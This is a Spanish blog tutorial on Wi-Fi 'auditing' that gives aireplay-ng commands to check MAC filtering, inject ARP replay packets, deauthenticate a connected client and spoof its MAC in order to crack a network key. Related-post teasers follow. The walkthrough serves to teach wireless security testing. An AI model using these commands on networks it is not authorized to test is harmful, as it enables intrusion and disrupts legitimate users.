Auditoria inalámbrica (II)

Pormiguel
A la hora de inyectar paquetes en el AP atacado debemos verificar su estado.
Verificando el filtrado MAC.
1. Antes de continuar debemos verificar si el punto de acceso realiza filtrado MAC en sus clientes. Usamos este comando:

sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>

Donde:

  • -1 Le dice que NO intente desautentificar clientes.
  • -e Es el nombre de la red objetivo.
  • -a Es la MAC del AP objetivo.
  • -h Es la MAC que tu quieras.

Si el resultado luce así:

03:22:32 Sending Authentication Request
03:22:32 Authentication successful
03:22:32 Sending Association Request
03:22:32 Association successful :-)

Significa que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.

Sin Filtrado MAC

1. Reinyección de paquetes.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>

Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Con Filtrado MAC

2. Obligamos a desautentificar al cliente que esta en el AP objetivo.

sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:

  • -0 Indica el numero de intentos.
  • -a El MAC del AP objetivo.
  • -c La dirección MAC del cliente.

Para la Re-Inyección se procede de la misma forma solo que ahora nos haremos pasar por el cliente.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>

Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Original El Tux AngelVerde

Publicaciones Similares

Auditoria Inalámbrica

Pormiguel

Aunque parezca un tópico, con este texto no pretendo incitar al aprovechamiento de conexiones a internet ajenas sino aprender y encontrar sentido a lo que se hace. Este tutorial se puede seguir utilizando una distribución preparada para ello como backtrack o bien instalando los paquetes necesarios en cualquier otra distribución. Abre una ventana de terminal…

sshput: Configurar el login sin password para servidores remotos SSH

Pormiguel

Aunque generar las claves publica/privada y subirlas a un servidor remoto SSH para que nos permita conectar directamente a la máquina sin necesidad de que nos pida la password es muy sencillo, nunca ésta de más tener un simple script que nos simplifique éstos pasos. Para ello podemos usar sshput, que nos permite generar las…

Installing OpenVPN-ALS on Ubuntu

Pormiguel

1) Use Synaptic or apt-get to install the following: ant (and its dependencies) sun-java6-bin sun-java6-jdk 2) Switch to root via «sudo -s». 3) Add the following to .bashrc in /root: export JAVA_HOME=/usr/lib/jvm/java-6-sun export PATH=$PATH:$JAVA_HOME/bin java -version Note: «java -version» is not actually required. It just gives you a nice indicator (when shifting to root) that…

Píldora Kali – Virtualbox

Pormiguel

Siempre que he instalado Kali hasta ahora en una máquina virtual utilizando Virtualbox he tenido problemas con el apartado gráficos en cuanto al redimensionamiento de la pantalla. Pues bien, viendo un tutorial por Youtube un compañero me dío la solución. Una vez instalado Kali, actualizado convenientemente y reiniciado, en consola tecleamos: apt-get install -y virtualbox-guest-x11…

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *